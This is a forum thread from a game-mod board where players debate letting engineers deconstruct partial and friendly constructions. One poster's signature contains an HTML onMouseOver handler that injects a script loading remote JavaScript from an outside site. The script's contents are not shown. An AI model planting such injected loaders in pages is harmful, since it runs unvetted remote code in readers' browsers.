Deconstruct mid-construction and friendly constructibles

Discussion for Bani's Pub mod

Moderators: Forum moderators, developers

Dubya

Deconstruct mid-construction and friendly constructibles

Post by Dubya »

I was originally going to post this thought in the ET Pro forum, but decided it's mostly a defense-boosting item..

I propose that partial constructions and (all?) friendly constructibles be deconstructible (not destructible).

Example -- axis are building the CP on Radar. You, an allied engie, kill the axis scum mid-build.

Status quo makes you wait before building that CP for your own team. Yuck!

I would like the ghosty CP to be deconstructible, such that you must expend an equal amount of power bar to deconstruct as was used to partial construct. After that, build away.

Similarly, you could deconstruct a partially-constructed tank or truck.

If two foes are building concurrently, I would say that should be an impasse for neutrals. For non-neutrals, maintain status quo. The tank on Goldrush pre-thievery exemplifies the importance of NOT making that an impasse.

I would also like to see friendlies be deconstructible. Instances where this could be useful: as allies after the tank is already home on Goldrush and as axis when you've nubbed yourself out of (and allies into) the fuel dump in Fuel Dump.
Rain

Post by Rain »

Good idea.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
=FF=im2good4u

Post by =FF=im2good4u »

i like the contruction for all since sometimes

you have to wait like 5 secs for the enemy contruction to disapapeer before you cna start

the prob would be if yousee an enemy build stuff then rush to him and build together whit him witch building should be build then the enemy or yours ?

i hope this wont be based "luck" like it is when 2 engineers build only 1 of em get the xp you just got to be lucky
Chappy

Post by Chappy »

=FF=im2weak4u wrote:the prob would be if yousee an enemy build stuff then rush to him and build together whit him witch building should be build then the enemy or yours ?
I'd imagine that if you didnt kill the guy first, it'd wind up no progress being made either way on the construction.

My feeling is that the friendly deconstruction might get abused by xp whore engineers.
gotenks

Post by gotenks »

you should not beable to deconstruct a friendly constructable, but a enemy constructable would be a good idea, however once it's built you should not beable to deconstruct it... should require dyno/satchel
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
blackwitz

Post by blackwitz »

friendly deconstructable would be used in a bad way of noob servers....(xp whores) i think its a great idea to be able to deconstruct an enemy's cp....or tank or what ever else
>>steven!

Post by >>steven! »

i think this is a good idea, i think ive said in et pro forums that imo this should be brough in for that mod aswell
UK Elite Guard
#ukeg on Quakenet
www.ukeliteguard.co.uk
Est. Jan 2002